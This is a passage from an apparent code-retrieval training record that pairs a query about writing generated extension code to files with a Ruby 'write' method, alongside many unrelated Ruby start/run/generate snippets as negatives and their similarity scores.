File.delete('tmp/evasive'+self.uuid+'.c')\n end\n\n end\n end",
"def run\n files_to_inspect.each do |path|\n SourceFile.new(\n linter_config: linter_config,\n io: io,\n path: path,\n root: root\n ).process\n end\n end",
"def start\n Vedeu.trigger(:_drb_start_)\n\n Vedeu::Terminal.open do\n Vedeu::Terminal.set_cursor_mode\n\n Vedeu.trigger(:_initialize_)\n\n runner { main_sequence }\n end\n end",
"def generate_code\n # only need to do this if code not set\n return if code\n\n ensure_unique_code\n end",
"def start(*)\n @module_started = true\n end",
"def start!\n process.start\n end",
"def start # :nodoc:\n log \"Starting\"\n end",
"def start\n\t\tinit\n\t end",
"def generate\n `bundle exec stasis`\nend",
"def run_scaffolds\n @file.each_pair do |class_name, spec|\n args = []\n args << class_name \n args += spec[\"fields\"].map do |field|\n \"#{field[\"name\"]}:#{field[\"type\"]}\"\n end\n args << '--timestamps'\n Rails::Generators.invoke \"rails:scaffold\", args\n end\n end",
"def start\n _bootstrap!\n self.started = true\n end",
"def start\n puts options\n config = Configuration.new(options)\n puts config.build\n exit(0)\n end",
"def start!\n verbose('Starting...')\n\n process_kaizen_archive(\n save_to_tempfile('https://codeload.github.com/Wixel/Kaizen/zip/master')\n )\n\n process_normalize_archive(\n save_to_tempfile('https://codeload.github.com/necolas/normalize.css/zip/master')\n )\n\n install_bourbon!\n end",
"def start\n jammit\n end",
"def start\n raise \"NotImplemented\"\n end",
"def run\n setup\n build_vm\n package_stemcell\n cleanup\n @target\n end",
"def run\n setup\n build_vm\n package_stemcell\n cleanup\n @target\n end",
"def invoke(namespace, args = ARGV, config = {})\n names = namespace.to_s.split(\":\")\n if klass = find_by_namespace(names.pop, names.any? && names.join(\":\"))\n args << \"--help\" if args.empty? && klass.arguments.any?(&:required?)\n klass.start(args, config)\n run_after_generate_callback if config[:behavior] == :invoke\n else\n options = sorted_groups.flat_map(&:last)\n error = Command::CorrectableNameError.new(\"Could not find generator '#{namespace}'.\", namespace, options)\n\n puts <<~MSG\n #{error.detailed_message}\n Run `bin/rails generate --help` for more options.\n MSG\n end\n end",
"def initial_generate\n \n end",
"def start\n setup_files\n create_report\nend",
"def start\n put :start\n end",
"def gen\n @genFlag = true\n res = ln((@overrideFlag ? '@Override ' : '') + 'public '+ (@static ? 'static ' : '') + @type + ' ' + @name + '(' +\n @args.collect {|var| (var.className.nil? ? var.type : var.className.name) + (var.instance_of?(Arr) ? '[]' * var.ndim : '') + ' ' + var.name}.join(', ') +\n ') {') + \"\\n\"\n shift(1)\n res+=ln('if ('+@args[0].name+'.length > 0) FuzzerUtils.seed('+rand(100000000).to_s+' + Long.parseLong('+@args[0].name+'[0]));') if @mainTestFlag and $conf.outer_control\n res+=ln('instanceCount++;') if @constructorFlag\n res += @context.genDeclarations() if !@mainFlag # no declarations should be generated for main method\n @rootStmt.nestedStmts['body'].each {|st| res += st.gen()} if !@mainFlag # no statements should be generated for main method\n res += ln('FuzzerUtils.joinThreads();') if @mainTestFlag && $run_methods>0\n res += (@mainTestFlag ? @context.genResPrint() + @methClass.context.genResPrint() : '')\n res += (!(@mainTestFlag||@mainFlag) ? genEnding() : '')\n glob = (@mainTestFlag ? @methClass.genGlobCheckSums() : '')\n#main method:\n if @mainFlag \n res += ln(\"try {\")\n shift(1)\n res += ln(@methClass.name + \" _instance = new \" + @methClass.name + \"();\")\n res += ln(\"for (int i = 0; i < \" + $conf.mainTest_calls_num.to_s + \"; i++ ) {\")\n shift(1)\n res += ln(\"_instance.\" + @methClass.methMainTest.name + \"(\" + @args[0].name + \");\")\n shift(-1)\n res += ln(\"}\")\n if ($conf.time_sleep_complete_tier1 > 0)\n res += ln(\"try {\") + ln(\"Thread.sleep(\" + $conf.time_sleep_complete_tier1.to_s + \");\") + ln(\" } catch (InterruptedException ie) {\") \n shift(1)\n res += ln(\"ie.printStackTrace();\") \n shift(-1)\n res += ln(\"}\")\n end\n if $conf.mainTest_calls_num_tier2 > 0\n res += ln(\"for (int i = 0; i < \" + $conf.mainTest_calls_num_tier2.to_s + \"; i++ ) {\")\n\n shift(1)\n res += ln(\"_instance.\" + @methClass.methMainTest.name + \"(\" + @args[0].name + \");\")\n shift(-1)\n res = res + ln(\"}\")\n end\n shift(-1)\n res += ln(\" } catch (Exception ex) {\")\n shift(1)\n res += ln(\"FuzzerUtils.out.println(ex.getClass().getCanonicalName());\")\n shift(-1)\n res += ln(\" }\")\n\n end\n \n res += \"\\n\" + glob unless glob.empty?\n\n shift(-1)\n res + ln(\"}\")\n end",
"def start\r\n return if running?\r\n\r\n log(\"Starting Runner...\")\r\n run!\r\n end",
"def start\n main_loop\n end",
"def start\n raise NotImplementedError\n end",
"def start\n @cmd.parse\n end",
"def run\n if @initializer.nil?\n @initializer = new\n \n yield @initializer.configuration if block_given?\n @initializer.process\n \n start_app\n else\n yield @initializer.configuration if block_given?\n end\n end",
"def run\n return unless setup_compilable\n\n @collection.files.values.each do |pointer|\n compiled_file = File.join(@collection.compiled_path, pointer['id'])\n FileUtils.mkdir_p File.dirname(compiled_file)\n FileUtils.cp_r pointer['realpath'], compiled_file\n Ruhoh::Friend.say { green \" > #{pointer['id']}\" }\n end\n end",
"def run\n return unless setup_compilable\n\n @collection.files.values.each do |pointer|\n compiled_file = File.join(@collection.compiled_path, pointer['id'])\n\n FileUtils.mkdir_p File.dirname(compiled_file)\n FileUtils.cp_r pointer['realpath'], compiled_file\n\n Ruhoh::Friend.say { green \" > #{pointer['id']}\" }\n end\n end",
"def execute\n\n logger = Logger.new(\"/dev/null\")\n logger.level = Logger::WARN\n log_adapter = JerichoLoggerAdapter.new(logger)\n\n perl_pages = File.join(top_git_directory, 'java/code/**/*.{jsp,jspf}')\n java_pages = File.join(top_git_directory, 'web//**/*.{pxt, pxi}')\n [perl_pages, java_pages].each do |pages|\n Dir.glob(pages).each do |path|\n content = File.read(path)\n on_file_start(content, path)\n source = Source.new(content)\n source.setLogger(log_adapter)\n out = OutputDocument.new(source)\n\n tags = source.getAllStartTags\n tags.each do |tag|\n if applicable?(tag)\n process_tag(source, out, tag, path)\n end\n end\n\n on_file_changed(content, out.toString, path)\n on_file_done(path)\n end\n end\n\n Dir.glob(File.join(top_git_directory, 'java/code/**/*.{java}')).each do |path|\n content = File.read(path)\n on_file_start(content, path)\n on_file_done(path)\n end\n\n Dir.glob(File.join(top_git_directory, 'web/**/*.{pm}')).each do |path|\n content = File.read(path)\n on_file_start(content, path)\n on_file_done(path)\n end\n\n on_done\n end",
"def run\n super\n create_easy_type_source\n create_simple_provider_source\n create_name_attribute_source\n end",
"def run!\n # Validate paths\n validate_paths!\n \n # Extract mockup\n copy_source_path_to_build_path!\n \n validate_stack!\n \n # Run stack\n run_stack!\n \n # Run finalizers\n run_finalizers!\n \n # Cleanup\n cleanup! if self.config[:cleanup_build]\n \n end",
"def start\n Command::Installer::Start.new(\n *command_params\n ).execute\n rescue => e\n catch_errors(e)\n end"
] |
[
"0.6937173",
"0.68181866",
"0.6668282",
"0.6487096",
"0.6418716",
"0.6359246",
"0.6329479",
"0.627829",
"0.6231169",
"0.6229854",
"0.6223654",
"0.62168235",
"0.62136465",
"0.62136465",
"0.62136465",
"0.62136465",
"0.6199343",
"0.6188479",
"0.6188479",
"0.6182261",
"0.6179925",
"0.6179925",
"0.6179925",
"0.6179925",
"0.6179925",
"0.6179925",
"0.6179925",
"0.6179925",
"0.61622626",
"0.6154483",
"0.6151426",
"0.6146258",
"0.61371267",
"0.613171",
"0.6116288",
"0.61073786",
"0.6097941",
"0.60933465",
"0.6090688",
"0.60840976",
"0.60833746",
"0.6075945",
"0.6075886",
"0.60705984",
"0.606806",
"0.6027264",
"0.6025044",
"0.6014498",
"0.6001599",
"0.599998",
"0.59986126",
"0.59986126",
"0.59977174",
"0.5994944",
"0.5993251",
"0.59930736",
"0.59930736",
"0.5986128",
"0.5965301",
"0.5954676",
"0.59517175",
"0.59446084",
"0.59158105",
"0.5906867",
"0.5902481",
"0.58908564",
"0.58789486",
"0.5866812",
"0.5853431",
"0.5836456",
"0.5821694",
"0.5816283",
"0.5808403",
"0.5802383",
"0.57976204",
"0.57892305",
"0.5786843",
"0.5785689",
"0.5783933",
"0.57822204",
"0.57783884",
"0.5777484",
"0.5764819",
"0.5764076",
"0.5757387",
"0.574676",
"0.57457834",
"0.57446635",
"0.57441676",
"0.572567",
"0.5719871",
"0.57186073",
"0.5714347",
"0.5713147",
"0.5711973",
"0.57055664",
"0.569284",
"0.5690132",
"0.56879807",
"0.56864685"
] |
0.6083291
|
41
|
Write out the generated code into files. build must be called before this step or nothing will be written out
|
def write
Logger.info "Writing code to files"
prepare_working_dir
process_other_source_files
# Create the code
writer_class = @writer_mode == :multiple ? Writers::MultipleFilesWriter : Writers::SingleFileWriter
writer_class.new(@builder, @working_dir).write
# Create the extconf.rb
extconf = Writers::ExtensionWriter.new(@builder, @working_dir)
extconf.options = @options
extconf.write
Logger.info "Files written"
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def generate\n setup\n\n write_style_sheet\n generate_index\n generate_class_files\n generate_file_files\n generate_table_of_contents\n @json_index.generate\n @json_index.generate_gzipped\n\n copy_static\n\n rescue => e\n debug_msg \"%s: %s\\n %s\" % [\n e.class.name, e.message, e.backtrace.join(\"\\n \")\n ]\n\n raise\n end",
"def generate()\n prepare\n ::Dir.mkdir(@output_path) unless ::File.exists? @output_path\n\n @pages.each do |name, page|\n SiteLog.debug(\"Starting page generation - #{name}\")\n page.generate(@output_path, @version, @preserve_tree)\n SiteLog.debug(\"Finished page generation - #{name}\")\n end\n\n @files.each do |path, data|\n path = ::File.join(@output_path, path)\n ::FileUtils.mkdir_p(::File.dirname(path))\n ::File.open(path, \"w\") do |f|\n f.write(data)\n end\n end\n end",
"def write\n\t\t#clear the directory before doing anything else\n\t\tclear @path\n\n\t\t#write out source code files\n\t\t@molds.each do |mold|\n\t\t\twrite_object(mold.name + \".h\", header(mold))\n\t\t\twrite_object(mold.name + \".m\", source(mold))\n\t\tend\n\tend",
"def generate(output_folder, types, version_name)\n generate_objects(output_folder, types, version_name)\n copy_files(output_folder) \\\n unless @config.files.nil? || @config.files.copy.nil?\n compile_examples(output_folder) unless @config.examples.nil?\n compile_changelog(output_folder) unless @config.changelog.nil?\n # Compilation has to be the last step, as some files (e.g.\n # CONTRIBUTING.md) may depend on the list of all files previously copied\n # or compiled.\n compile_files(output_folder, version_name) \\\n unless @config.files.nil? || @config.files.compile.nil?\n\n generate_datasources(output_folder, types, version_name) \\\n unless @config.datasources.nil?\n apply_file_acls(output_folder) \\\n unless @config.files.nil? || @config.files.permissions.nil?\n end",
"def run(inname, outname)\n\tgenerated = gen inname\n\n\tcopy_dependencies inname, outname, generated\n\n\tFile.write outname, generated\nend",
"def build\n sync\n output_dir.mkpath\n outputs.each(&:build)\n output_dir.touch\n end",
"def build!\n create_output_directory\n spec.source_directories.each { |d| simple_compile_directory(d) }\n compile_files(spec.all_javascript_paths)\n compile_files(spec.all_stylesheet_paths)\n write_manifest\n end",
"def write\n make_parent_directory\n generate_file\n end",
"def generate\n if @options.dry_run then\n # do nothing\n @generator.generate\n else\n Dir.chdir @options.op_dir do\n unless @options.quiet then\n $stderr.puts \"\\nGenerating #{@generator.class.name.sub(/^.*::/, '')} format into #{Dir.pwd}...\"\n end\n\n @generator.generate\n update_output_dir '.', @start_time, @last_modified\n end\n end\n end",
"def generate (path)\n File.open(path, \"w\") do |f|\n @output.each do |line|\n f.puts line\n end\n end \n end",
"def generate()\n objects = []\n\n # generate object file tasks\n files.each do |fname|\n output_file = File.join(@build_dir, File.basename(fname).ext('o'))\n objects.push output_file\n file output_file => [ fname ] do\n get_toolchain().compile( fname, output_file )\n end\n end\n\n # Link object files\n file output_file() => objects do\n get_toolchain().link( objects, output_file() )\n end\n\n # Create top level task\n desc \"Build the #{@name} application\"\n task @name => [ output_file() ]\n end",
"def generate_build\n filename = \"#{self.build_path}/#{ANT_BUILD_NAME}\"\n log \"Writing build xml to #{filename}\"\n File.open(filename, 'w') do |f|\n f.write(self.build_doc)\n f.close\n end\n filename\n end",
"def genWritables(model, outRoot)\n firstRecord = model.records.values.first\n pyPackage, base, packagePath = DataMetaDom::PojoLexer::assertNamespace(firstRecord.name)\n # Next: replace dots with underscores.The path also adjusted accordingly.\n #\n # Rationale for this, quoting PEP 8:\n #\n # Package and Module Names\n #\n # Modules should have short, all-lowercase names. Underscores can be used in the module name if it improves\n # readability. Python packages should also have short, all-lowercase names, although the use of underscores\n # is discouraged.\n #\n # Short and all-lowercase names, and improving readability if you have complex system and need long package names,\n # is \"discouraged\". Can't do this here, our system is more complicated for strictly religous, \"pythonic\" Python.\n # A tool must be enabling, and in this case, this irrational ruling gets in the way.\n # And dots are a no-no, Python can't find packages with complicated package structures and imports.\n #\n # Hence, we opt for long package names with underscores for distinctiveness and readability:\n pyPackage = pyPackage.gsub('.', '_')\n packagePath = packagePath.gsub('/', '_')\n destDir = File.join(outRoot, packagePath)\n FileUtils.mkdir_p destDir\n wriOut = nil # File.open(File.join(destDir, \"#{writableClassName(base)}.py\"), 'wb')\n serFile = File.join(destDir, 'serial.py')\n FileUtils.rm serFile if File.file?(serFile)\n ioOut = File.open(serFile, 'wb') # one huge serialization file\n ioOut.puts %|# This file is generated by DataMeta DOM. Do not edit manually!\n#package #{pyPackage}\n\nfrom hadoop.io import WritableUtils, InputStream, OutputStream, Text\nfrom ebay_datameta_core.base import DateTime\nfrom decimal import *\nfrom collections import *\nfrom bitarray import bitarray\nfrom ebay_datameta_hadoop.base import *\nfrom model import *\n\n|\n begin\n model.records.values.each { |e|\n _, base, _ = DataMetaDom::PojoLexer::assertNamespace(e.name)\n case\n when e.kind_of?(DataMetaDom::Record)\n genWritable model, wriOut, ioOut, e, pyPackage, base\n else\n raise \"Unsupported Entity: #{e.inspect}\"\n end\n }\n ensure\n begin\n ioOut.close\n ensure\n #wriOut.close\n end\n end\n end",
"def build\n clean_build_directory\n copy_templates\n copy_functions\n copy_includes\n build_assets\n end",
"def generate(output_folder, types, _product_path, _dump_yaml, generate_code, generate_docs)\n generate_objects(\n output_folder,\n types,\n generate_code,\n generate_docs\n )\n end",
"def generate( toplevels )\n\t\t@outputdir = Pathname.new( @options.op_dir ).expand_path( @basedir )\n\t\tif RDoc::Generator::Context.respond_to?( :build_indicies)\n\t \t@files, @classes = RDoc::Generator::Context.build_indicies( toplevels, @options )\n\t\telse\n\t \t@files, @classes = RDoc::Generator::Context.build_indices( toplevels, @options )\n\t\tend\n\n\t\t# Now actually write the output\n\t\tgenerate_xhtml( @options, @files, @classes )\n\n\trescue StandardError => err\n\t\tdebug_msg \"%s: %s\\n %s\" % [ err.class.name, err.message, err.backtrace.join(\"\\n \") ]\n\t\traise\n\tend",
"def generate( toplevels )\n\t\t@outputdir = Pathname.new( @options.op_dir ).expand_path( @basedir )\n\t\tif RDoc::Generator::Context.respond_to?( :build_indicies)\n\t \t@files, @classes = RDoc::Generator::Context.build_indicies( toplevels, @options )\n\t\telse\n\t \t@files, @classes = RDoc::Generator::Context.build_indices( toplevels, @options )\n\t\tend\n\n\t\t# Now actually write the output\n\t\tgenerate_xhtml( @options, @files, @classes )\n\n\trescue StandardError => err\n\t\tdebug_msg \"%s: %s\\n %s\" % [ err.class.name, err.message, err.backtrace.join(\"\\n \") ]\n\t\traise\n\tend",
"def rebuild(options)\n puts \"rebuilding to #{options[:out]}\"\n puts options[:files].inspect\n File.open(options[:out], 'w') do |out|\n # out.write @pre if @pre\n\n options[:files].each do |file|\n out.write wrap_source file\n end\n\n if options[:main]\n main = options[:main].sub(/\\.rb$/, '')\n out.write \"opal.require('#{main}');\\n\"\n end\n\n # out.write @post if @post\n end\n end",
"def build\n puts \"---> erase_old_files\" if verbose\n erase_old_files\n puts \"---> load_source\" if verbose\n load_source\n puts \"---> compose\" if verbose\n compose\n puts \"---> save_lilypond_file\" if verbose\n save_lilypond_file\n\n # Production du PDF ou du PNG\n res = case output_format\n when :pdf, nil\n puts \"---> output_as_pdf\" if verbose\n output_as_pdf\n when :png\n puts \"---> output_as_png\" if verbose\n output_as_png\n else\n puts \"Format de sortie inconnu (#{output_format}). Je sors en pdf\" if verbose\n output_as_pdf\n end\n\n if res === false || verbose\n App::show_debug\n end\n end",
"def generate()\n traverse(@root)\n @un_arr.traverseUnions if @@union_flag\n @un_arr.traverseArrays if @@dyn_array_flag\n write_to_file\n end",
"def generate\n verify_path\n \n self.layouts.each {|layout| layout.write_file}\n self.pages.each {|page| page.write_file}\n \n Webby.site.content_dir = self.content_dir\n Webby.site.layout_dir = self.layout_dir\n Webby.site.template_dir = self.template_dir\n Webby.site.output_dir = self.output_dir\n \n Merb.logger.debug \"content_dir: #{Webby.site.content_dir}\"\n Merb.logger.debug \"layout_dir: #{Webby.site.layout_dir}\"\n Merb.logger.debug \"template_dir: #{Webby.site.template_dir}\"\n Merb.logger.debug \"output_dir: #{Webby.site.output_dir}\"\n \n # Use directory => '.' option to generate the site in output_dir\n Webby.site.page_defaults = {'layout' => self.default_layout.relative_path,\n 'directory' => '.',\n 'collision' => :force}\n \n Merb.logger.debug \"page_defaults: #{Webby.site.page_defaults}\" \n # returns nil if success \n # Webby::Builder.run\n Webby::Builder.run :rebuild => true\n end",
"def generate!\n info \"GENERATE\"\n\n f = Generator.new @dbi, @settings, @logger\n xslt = XML::XSLT.new\n xslt.xml = f.generate_root.to_s\n\n default_template_dir = File.dirname(__FILE__) + '/../../data/templates'\n template_dir = @settings['templates'] || default_template_dir\n output_dir = @settings['output']\n\n task \"copy static files\" do\n FileUtils.mkdir_p output_dir\n FileUtils.cp_r Dir[File.join( template_dir, 'static', '*' )], output_dir\n end\n\n begin\n Dir.foreach(template_dir) { |template_file|\n next if template_file =~ /^\\./ || template_file == 'static'\n\n task \"process #{template_file}\" do\n xslt.xsl = File.join( template_dir, template_file )\n File::open( File.join( output_dir, template_file ), 'w') { |f| f.write(xslt.serve) }\n end\n }\n rescue Errno::ENOENT\n warn \"Couldn't find templates directory, fallback to default templates!\"\n template_dir = default_template_dir\n retry\n end\n end",
"def generate_output(inputs, output)\n inputs.each do |input|\n begin\n raise error (\"I need a file to compile\") if not input.respond_to?(:read)\n\n #puts \"tsc: #{input.path} \" << options.join(\" \")\n\n #Using compile_file because it gives us better error messages\n result = TypeScript::Node::compile_file(input.fullpath, options)\n if result.success?\n output.write(result.js)\n else\n raise result.stderr\n end\n rescue ExecJS::Error => error\n raise error, \"Error compiling #{input.path}. #{error.message}\"\n rescue RuntimeError => e\n raise e, \"Error compiling #{input.path}. #{e.message}\"\n end\n end\n end",
"def build()\n\t`rm -rf recordings/`\n\t`mkdir recordings`\n\t`rm -rf chapters/`\n\t`mkdir chapters`\n\t`rm -rf outputList.txt`\n\t`touch outputList.txt`\nend",
"def generate_output\n write_average_fitness('output/average.txt')\n write_best_fitness('output/best.txt')\n write_survivors('output/survivors.txt')\n write_traits('output/traits.txt')\n end",
"def generate\n\t\t dir = \"./experiments/\" + @arguments.first\n\t\t\tDir.mkdir(dir)\n\t\t\tFile.open(dir + \"/\" + @arguments.first + \".rb\", \"w\") do |req_file|\n\t\t\t req_file.puts \"# ## #{as_human_name @arguments.first} ##\"\n\t\t\t req_file.puts \"# \"+@options.description.split(\"\\n\").join(\"\\n# \")\n\t\t\t req_file.puts\n\t\t\t req_file.puts\n\t\t\t req_file.puts \"# The first contious block of comment will be included in your report.\"\n\t\t\t req_file.puts \"# This includes the reference implementation.\"\n\t\t\t req_file.puts \"# Override any desired files in this directory.\"\n\t\t\t Dir[\"./app/**/*.{rb,o,dll,so,bundle}\"].each do |f|\n\t\t\t next if File.basename(f) == 'extconfig.rb'\n\t\t\t p = File.expand_path(f).split(\"/\") - File.expand_path(\".\").split(\"/\")\n\t\t\t req_file.puts \"require \\\"#{p.join(\"/\").gsub(/\\.(rb|o|dll|so|bundle)$/, \"\")}\\\"\"\n\t\t\t end\n\t\t\t req_file.puts \"\\nclass #{as_class_name @arguments.first} < MyExperiment\\n\\t\\nend\"\n\t\t\tend\n\t\t\tFile.open(dir + \"/config.yaml\", \"w\") do |f|\n\t\t\t f << \"---\\nexperiment:\\n development:\\n compute:\\n\"\n end\n end",
"def generator\n printf(\"%-10s %s\\n\",\"generator:\", \"generating.. (*hdls, *bmm, *scr, *prj)\")\n exitcode = 1\n FileUtils.rm_r Dir.glob(\"#{TMPDIR}/hdl/*.vhd\")\n FileUtils.rm_r Dir.glob(\"#{TMPDIR}/synthesis/*.vhd\")\n File.symlink(\"../pcores\", \"#{TMPDIR}/pcores\") unless File.symlink?(\"#{TMPDIR}/pcores\")\n pipe = IO.popen(\"platgen -od #{TMPDIR}/ -p xc4vfx100ff1152-10 -lang vhdl ../system.mhs\", \"r+\")\n # pipe = IO.popen(\"platgen -p xc4vfx12ff668-10 system.mhs\", \"r+\")\n pipe.each do |line|\n # puts line\n # do not synthesize\n if line =~ /Running XST synthesis/\n exitcode = 0\n Process.kill 'TERM', pipe.pid\n break\n end\n end\n unless exitcode == 0\n p \"# Error with platgen - check platgen.log\"\n exit\n end\n\n # he generated files under $PROJECT/TMPDIR/{hdl,synthesis}\n # copy them to $PROJECT/hdl/ under certain conditions (size differs & or abstence)\n FileUtils.mkdir('hdl') unless File.directory? 'hdl'\n FileUtils.mkdir('synthesis') unless File.directory? 'synthesis'\n FileUtils.mkdir_p(BMM_RESULTSDIR) unless File.directory? BMM_RESULTSDIR # output directory\n\n # move_files_if(\"#{TMPDIR}/hdl/*.vhd\")\n move_files_if(\"#{TMPDIR}/implementation/#{TOPLEVEL}.bmm\", BMM_RESULTSDIR)\n move_files_if(\"#{TMPDIR}/synthesis/*.scr\" )\n move_files_if(\"#{TMPDIR}/synthesis/*.prj\")\n Find.find(\"#{TMPDIR}/hdl\") do |path|\n move_files_if(path) if File.file? path\n end\n\n # move logfiles to scratch\n FileUtils.mkdir_p(GEN_SCRATCHDIR) unless File.directory? GEN_SCRATCHDIR\n [\"platgen.log\", \"platgen.opt\", \"#{TMPDIR}/clock_generator*.log\"].each { |t|\n FileUtils.mv(t, \"#{GEN_SCRATCHDIR}/\") if File.file? t\n }\n\n # change timestamps\n\nend",
"def write_file\n \n # if dirty?\n generate\n \n delete_file\n File.open(absolute_path.gsub(/\\.txt$/, \"\"), 'w+') do |f| \n f.write(generated_header)\n f.write(generated_content)\n end\n # not_dirty\n # end\n end",
"def write_depends\r\n @source_files.each { |file|\r\n depends = []\r\n flatten_depends depends, file\r\n @flat_depends[file] = depends\r\n }\r\n FileUtils.mkdir_p File.dirname(@file)\r\n File.open(@file, 'w') { |f|\r\n @flat_depends.each { |src, deps|\r\n f << \"add_dep '#{src}', [\"\r\n if deps and not deps.empty?\r\n f << \"'#{deps.join(\"', '\")}'\" end\r\n f << \"]\\n\"\r\n }\r\n f << \"\\n\"\r\n }\r\n end",
"def generate; end",
"def generate; end",
"def generate #(args, opts)\n actionlist = actionlist(copylist)\n\n if actionlist.empty?\n logger.report_nothing_to_generate\n return\n end\n\n source = '' # FIXME\n logger.report_startup(source, output)\n mkdir_p(output) #unless File.directory?(output)\n Dir.chdir(output) do\n actionlist.each do |action, loc, src, dest, opts|\n atime = Time.now\n result, fulldest = *__send__(action, loc, src, dest, opts)\n logger.report_create(relative_to_output(dest), result, atime)\n #logger.report_create(dest, result, atime)\n end\n end\n logger.report_complete\n logger.report_fixes #if session.newproject?\n end",
"def build\n raise ConfigurationError.new(\"Must specify working directory\") unless @working_dir\n raise ConfigurationError.new(\"Must specify which sources to wrap\") unless @parser\n\n Logger.info \"Beginning code generation\"\n\n @builder = Builders::ExtensionNode.new(@name, @node || @parser, @modules)\n @builder.add_includes @options[:includes]\n @builder.build\n @builder.sort\n\n Logger.info \"Code generation complete\"\n end",
"def generate_class_files\n debug_msg \"Generating class documentation in #@outputdir\"\n templatefile = Pathname.new(File.dirname(__FILE__) + '/template/railsfish/classpage.rhtml')\n \n @classes.each do |klass|\n debug_msg \" working on %s (%s)\" % [ klass.full_name, klass.path ]\n outfile = @outputdir + klass.path\n rel_prefix = @outputdir.relative_path_from( outfile.dirname )\n svninfo = self.get_svninfo( klass )\n \n debug_msg \" rendering #{outfile}\"\n self.render_template( templatefile, binding(), outfile )\n end\n end",
"def create_output\n test_case = TestCase.find(params[:id])\n tempDirectory = Rails.configuration.compile_directory + current_user.name.tr(\" \", \"_\") + '_' + test_case.id.to_s + '/'\n if not Dir.exists?(tempDirectory) \n Dir.mkdir(tempDirectory)\n end\n\n # Adds in the test case files\n test_case.create_directory(tempDirectory)\n\n # Compiles and runs the program\n comp_status = test_case.compile_code(tempDirectory)\n\n if comp_status.nil?\n flash[:notice] = \"Outputs Made\"\n else\n flash[:notice] = \"No Outputs Made\"\n flash[:comperr] = comp_status\n end\n\n FileUtils.rm_rf(tempDirectory)\n\n respond_to do |format|\n format.js { render :action => \"refresh_output\" }\n end\n end",
"def build\n asdocs = scan(@src)\n\n if asdocs.empty?\n puts \"No .asdoc files found.\"\n else\n create_xml(asdocs)\n to_disk(xml)\n end\n end",
"def generate_all\n copy_template_dir('layouts', 'layouts')\n copy_template_dir('content/bootstrap', 'content/bootstrap')\n copy_template_dir('content/content', 'content/content')\n delete_target_file('lib/default.rb')\n copy_template_dir('lib', 'lib')\n delete_target_file('Rules')\n copy_template_file('Rules', 'Rules')\n copy_template_file('.gitignore', '.gitignore')\n copy_template_file('cg_config.rb', 'cg_config.rb')\n copy_template_file('cg_config.rb_sample', 'cg_config.rb_sample')\n delete_target_file('content/stylesheet.css')\n delete_target_file('content/index.html')\n delete_target_file('layouts/default.html')\n create_empty_dir('content/images')\n end",
"def generate\n end",
"def generate\n proxy_hpp = Generation.render_template \"proxies\", \"Task.hpp\", binding\n proxy_cpp = Generation.render_template \"proxies\", \"Task.cpp\", binding\n file_proxy_hpp = Generation.save_automatic \"proxies\", \"#{task.basename}.hpp\", proxy_hpp\n file_proxy_cpp = Generation.save_automatic \"proxies\", \"#{task.basename}.cpp\", proxy_cpp\n\n cmake = Generation.render_template 'proxies', 'CMakeLists.txt', binding\n Generation.save_automatic('proxies', \"CMakeLists.txt\", cmake)\n \n pc = Generation.render_template \"proxies\", \"proxies.pc\", binding\n Generation.save_automatic \"proxies\", \"#{project.name}-proxies.pc.in\", pc\n end",
"def generate\n gen_app\n handle_public_index\n gen_file(\"config/routes.rb\", \"routes\")\n @app.goals.values.each_with_index { |goal, i| gen_goal(goal, i) }\n gen_misc\n self\n end",
"def generate\n puts @root\n \n puts \"Processing files ...\"\n start_time = Time.now\n puts \"start --\"\n\n # getting list of committers\n puts \"Getting list of committers ...\"\n @committers = `git log --raw | grep \"^Author:\" | sort | uniq | sed -e 's/^Author: //g' -e 's/<.*//g'`.split(\"\\n\")\n @committers.uniq!\n\n # creaing an html file\n html_composer = HtmlComposer.new(@root, @report_path)\n html_composer.write_html_header\n\n files = FileList.new() do |f|\n @excluded_files.each { |e| \n f.exclude(e)\n puts \"Excluded #{e}\" \n }\n end\n @included_files.each do |i|\n files.add(i)\n end\n\n FileUtils.mkdir_p \"#{@root}/gs_temp\"\n Parallel.each(files, :in_processes => @config[:in_processes]) do |path|\n process_file(html_composer, path)\n end\n FileUtils.rm_r \"#{@root}/gs_temp\"\n\n # closing the html file\n html_composer.write_html_footer\n\n puts \"\"\n puts \"-- end\"\n\n elapsed_time = (Time.now - start_time).round(2)\n puts \"Processed in #{elapsed_time} secs\"\n end",
"def generate!\n generator.invoke_all\n end",
"def compile\n Milkrun.say \"Cleaning and assembling a new #{task} build\"\n `./gradlew clean assemble#{task}`\n @assembled = true\n Milkrun.say \"Package built to #{path}\"\n path\n end",
"def generate\n template_dir = File.join(File.dirname(__FILE__), \"../templates\")\n proxy_hpp = Generation.render_template template_dir, \"proxies\", \"Task.hpp\", binding\n proxy_cpp = Generation.render_template template_dir, \"proxies\", \"Task.cpp\", binding\n file_proxy_hpp = Generation.save_automatic(project.name, \"/proxies\", \"#{task.basename}.hpp\", proxy_hpp)\n file_proxy_cpp = Generation.save_automatic(project.name, \"/proxies\", \"#{task.basename}.cpp\", proxy_cpp)\n\n forward_hpp = Generation.render_template template_dir, \"proxies\", \"Forward.hpp\", binding\n file_forward_hpp = Generation.save_automatic(project.name, \"proxies\", \"#{task.basename}Forward.hpp\", forward_hpp)\n\n cmake = Generation.render_template template_dir, 'proxies', 'CMakeLists.txt', binding\n Generation.save_automatic(project.name, 'proxies', \"CMakeLists.txt\", cmake)\n \n pc = Generation.render_template template_dir, \"proxies\", \"proxies.pc\", binding\n Generation.save_automatic(project.name, \"proxies\", \"#{project.name}-proxies.pc.in\", pc)\n end",
"def generate\n end",
"def writeCompiledXMLFile(tokens, classNames, outFile)\n str = compileClass(tokens, classNames)\n str = tabXMLTags(str)\n xmlFile = File.new(outFile, \"w\")\n\n\n xmlFile.syswrite(str)\nend",
"def generate_data!\n start_dir = Dir.pwd\n \n Dir.chdir tool_path\n system \"./generate -pc #{product_factor} -fn #{filename} -fc\"\n ensure\n Dir.chdir start_dir\n end",
"def build()\n \n #check dir exists, if not, make it\n if(!File.exists?(@path))\n Dir.mkdir(@path)\n end\n \n #build directory structure\n puts 'Building directory structure'\n build_skeleton(@template.directory_structure)\n \n #execute build tasks\n puts 'Running build tasks'\n execute_tasks(@template.tasks,@template.path)\n \n puts 'Skeleton built'\n \n end",
"def gen_dir\n File.join(root_path, 'generated')\n end",
